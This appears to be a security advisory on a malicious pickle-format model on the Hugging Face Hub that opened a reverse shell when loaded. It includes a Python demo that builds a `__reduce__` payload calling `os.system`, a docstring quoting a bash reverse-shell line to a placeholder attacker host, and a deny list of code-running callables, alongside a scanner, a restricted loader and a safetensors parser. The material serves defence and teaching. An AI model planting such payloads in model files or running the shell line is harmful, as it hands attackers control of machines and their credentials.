Malicious PyTorch Model on Hugging Face Hub Executes Code on Load via Unsafe Deserialization
Overview
A supply chain attack was discovered in which a popular open-source model on the Hugging Face Hub was compromised through its maintainer's account. The attacker uploaded a new version of the model weights in the legacy `pytorch_model.bin` (pickle) format. This format can carry arbitrary code because it is a Python `pickle` stream: the unpickler does not just read data, it executes opcodes, and the `GLOBAL`/`STACK_GLOBAL` and `REDUCE` opcodes let the file name any importable callable and invoke it with attacker-chosen arguments. The attacker crafted the file to include an object whose `__reduce__` method returned such a callable. When a victim downloaded the model and loaded it with a plain `torch.load()` call (which, before PyTorch 2.6 changed the default to `weights_only=True`, unpickled the file without restriction), the deserializer ran the payload during the load itself, before any model code was touched. The payload established a reverse shell to the attacker's server, giving them control of the user's machine or of the CI/CD runner where the model was being loaded. From there the attacker could read sensitive data, including API keys, cloud credentials held in environment variables, and proprietary code. The incident highlighted the risk of trusting unscanned model artifacts from public repositories and the importance of using serialization formats such as `safetensors`, which describe tensors with a JSON header plus raw bytes and have no mechanism for referencing or executing code.
Affected Systems
Testing Guide
1. In a secure, isolated environment, download a model in the `.bin` or `.pth` format. Note that recent `torch.save()` output is a zip archive whose `data.pkl` member holds the pickle stream; `picklescan` unpacks such archives itself.
2. Before loading it, run a static analysis tool like `picklescan` on the model file: `picklescan -p /path/to/model.bin`. The scanner walks the opcode stream without executing it.
3. The tool flags the file as dangerous when a `GLOBAL`, `STACK_GLOBAL` or `INST` opcode references a module or callable on its deny list (for example `os.system`, `subprocess.Popen`, `builtins.eval` or `socket.socket`). The `REDUCE` opcode by itself is not the signal: every legitimate PyTorch checkpoint uses it to rebuild tensors via `torch._utils._rebuild_tensor_v2`, so what matters is which callable is being reduced.
4. If the scan reports dangerous imports, the model should be considered unsafe to load via `torch.load()`. A clean scan is evidence, not proof; still load it with `weights_only=True` and in isolation.
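The following is an added example, not code from the original advisory or from Hugging Face, that reproduces the mechanism described above and the scan from the testing guide using only the standard library (no `torch` or `picklescan` needed). It builds a state-dict-shaped pickle containing a `__reduce__` payload, lists the globals the stream imports the way `picklescan` does, and loads it through a restricted unpickler that refuses unexpected imports, which is the idea behind `torch.load(weights_only=True)`. The payload, the deny list and the class names are constructed for illustration; `picklescan`'s real deny list is longer.

```python
import io
import os
import pickle
import pickletools

# Constructed, non-exhaustive deny list of (module, name) pairs that mean
# "this pickle will call something capable of running code". os.system
# pickles under its implementation module (posix on Linux, nt on Windows).
DANGEROUS_GLOBALS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"), ("os", "popen"),
    ("subprocess", "Popen"), ("subprocess", "check_output"),
    ("builtins", "eval"), ("builtins", "exec"), ("builtins", "__import__"),
    ("socket", "socket"),
}


class ReverseShellStub:
    """Stand-in for the attacker's class. A real payload would reduce to
    os.system('bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'); this one only echoes."""

    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call os.system(arg)".
        # The call happens inside pickle.load, before the caller sees anything.
        return (os.system, ("echo pickle payload executed",))


def build_benign_model() -> bytes:
    """Constructed sample: a plain state dict (lists stand in for tensors)."""
    return pickle.dumps({"layer.weight": [0.1, 0.2, 0.3]}, protocol=2)


def build_malicious_model() -> bytes:
    """Constructed sample: same shape, plus a payload object smuggled in."""
    state_dict = {"layer.weight": [0.1, 0.2, 0.3], "_": ReverseShellStub()}
    return pickle.dumps(state_dict, protocol=2)  # torch.save also uses protocol 2


def scan_pickle(data: bytes) -> list:
    """Static scan: every (module, name) the stream imports, without executing it.
    GLOBAL/INST carry "module name" inline; STACK_GLOBAL (protocol 4+) takes the
    two most recently pushed strings."""
    found, recent_strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


def is_dangerous(data: bytes) -> bool:
    return any(g in DANGEROUS_GLOBALS for g in scan_pickle(data))


class RestrictedUnpickler(pickle.Unpickler):
    """Allow only the globals a plain state dict needs. find_class runs when the
    GLOBAL opcode is hit, so the refusal happens before REDUCE can call anything."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_load_refuses(data: bytes) -> bool:
    try:
        safe_load(data)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    bad = build_malicious_model()
    print("imports:", scan_pickle(bad), "dangerous:", is_dangerous(bad))
    print("restricted load refused:", safe_load_refuses(bad))
    pickle.loads(bad)  # unrestricted load: the echo runs during deserialization
```

Running the script shows the echo being printed by `pickle.loads`, not by any line of the script, which is exactly what a victim's `torch.load()` did. The restricted unpickler is deliberately narrow; for real checkpoints rely on `torch.load(weights_only=True)`, whose allow list covers the tensor-rebuilding helpers.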
Mitigation Steps
1. **Use SafeTensors:** Load models only from `.safetensors` files. With `transformers`, pass `use_safetensors=True` to `from_pretrained()` so that loading fails instead of silently falling back to a pickle checkpoint. Where `torch.load()` is unavoidable, call it with `weights_only=True`, which restricts unpickling to tensors and a small allow list of types.
2. **Model Scanning:** Before loading any model, scan it for malicious code with `picklescan` or rely on the Hugging Face Hub's built-in pickle scanning, and treat a flagged file as compromised rather than as a false positive to be bypassed.
3. **Isolated Loading:** Load new or untrusted models in a sandboxed, network-isolated environment with no credentials in the environment, so that a payload has nothing to steal and no way to call home.
4. **Verify Sources:** Only use models from trusted, verified creators on platforms like Hugging Face. Pin the exact commit revision you have reviewed (for example via the `revision` argument of `from_pretrained()`), and be cautious of newly uploaded models or unexpected updates to existing ones.
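To make concrete why step 1 removes the code-execution path rather than merely hiding it, here is an added example (not the `safetensors` library's own code) that writes and parses the safetensors container with the standard library alone: an 8-byte little-endian header length, a JSON header mapping tensor names to `dtype`, `shape` and `data_offsets`, then raw bytes. The parser does nothing but `json.loads` and bounds arithmetic, so a tampered file can at most produce an error. The dtype table is a subset of the real one, and the 100 MB header cap mirrors the reference implementation's guard against a hostile header length.

```python
import json
import struct

# Subset of the safetensors dtype table: name -> (struct format char, byte size)
DTYPES = {"F32": ("f", 4), "F64": ("d", 8), "I32": ("i", 4), "I64": ("q", 8)}
MAX_HEADER_BYTES = 100 * 1024 * 1024  # refuse absurd header lengths up front


def save_safetensors(tensors: dict, metadata: dict = None) -> bytes:
    """Serialize {name: (dtype, shape, flat_values)} into safetensors bytes.
    Assumption for this example: values are flat Python lists, not arrays."""
    header, blobs, offset = {}, [], 0
    for name, (dtype, shape, values) in tensors.items():
        fmt, _size = DTYPES[dtype]
        n = 1
        for d in shape:
            n *= d
        if len(values) != n:
            raise ValueError(f"{name}: shape {shape} needs {n} values, got {len(values)}")
        blob = struct.pack(f"<{n}{fmt}", *values)
        header[name] = {"dtype": dtype, "shape": list(shape),
                        "data_offsets": [offset, offset + len(blob)]}
        blobs.append(blob)
        offset += len(blob)
    if metadata:
        header["__metadata__"] = {str(k): str(v) for k, v in metadata.items()}
    hdr = json.dumps(header, separators=(",", ":")).encode("utf-8")
    hdr += b" " * (-len(hdr) % 8)  # pad header to an 8-byte boundary as the format does
    return struct.pack("<Q", len(hdr)) + hdr + b"".join(blobs)


def load_safetensors(data: bytes):
    """Parse safetensors bytes into ({name: (dtype, shape, flat_values)}, metadata).
    Every field is checked against the buffer before it is used; there is no
    opcode stream and no way for the file to name a callable."""
    if len(data) < 8:
        raise ValueError("truncated: missing header length")
    (hdr_len,) = struct.unpack("<Q", data[:8])
    if hdr_len > MAX_HEADER_BYTES or 8 + hdr_len > len(data):
        raise ValueError("header length out of bounds")
    header = json.loads(data[8:8 + hdr_len])
    body = data[8 + hdr_len:]
    tensors = {}
    for name, info in header.items():
        if name == "__metadata__":
            continue
        fmt, size = DTYPES[info["dtype"]]  # unknown dtype -> KeyError, never code
        shape = info["shape"]
        if any((not isinstance(d, int)) or d < 0 for d in shape):
            raise ValueError(f"{name}: bad shape {shape}")
        n = 1
        for d in shape:
            n *= d
        start, end = info["data_offsets"]
        if not (0 <= start <= end <= len(body)) or end - start != n * size:
            raise ValueError(f"{name}: data_offsets inconsistent with shape/dtype")
        values = list(struct.unpack(f"<{n}{fmt}", body[start:end]))
        tensors[name] = (info["dtype"], tuple(shape), values)
    return tensors, header.get("__metadata__", {})


def is_valid_safetensors(data: bytes) -> bool:
    """True if the bytes parse cleanly; any tampering surfaces as an exception."""
    try:
        load_safetensors(data)
        return True
    except (ValueError, KeyError, TypeError, struct.error):
        return False


if __name__ == "__main__":
    blob = save_safetensors({"layer.weight": ("F32", (2, 2), [1.0, 2.0, 3.0, 4.0])},
                            {"format": "pt"})
    print(load_safetensors(blob))
    print("truncated file valid:", is_valid_safetensors(blob[:-1]))
```

Contrast this with the pickle case: an attacker who controls a safetensors file can choose the numbers in the header, but the only thing the loader will ever do with them is compare offsets and call `struct.unpack`.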
Patch Details
The `transformers` library now saves and loads `safetensors` by default and strongly recommends it over pickle checkpoints. PyTorch 2.6 changed the default of `torch.load()` to `weights_only=True`, so an unrestricted unpickle now requires an explicit opt-in. Hugging Face has improved its on-platform scanning of pickle files (built on `picklescan`) to detect malicious payloads and to mark flagged files on the model page.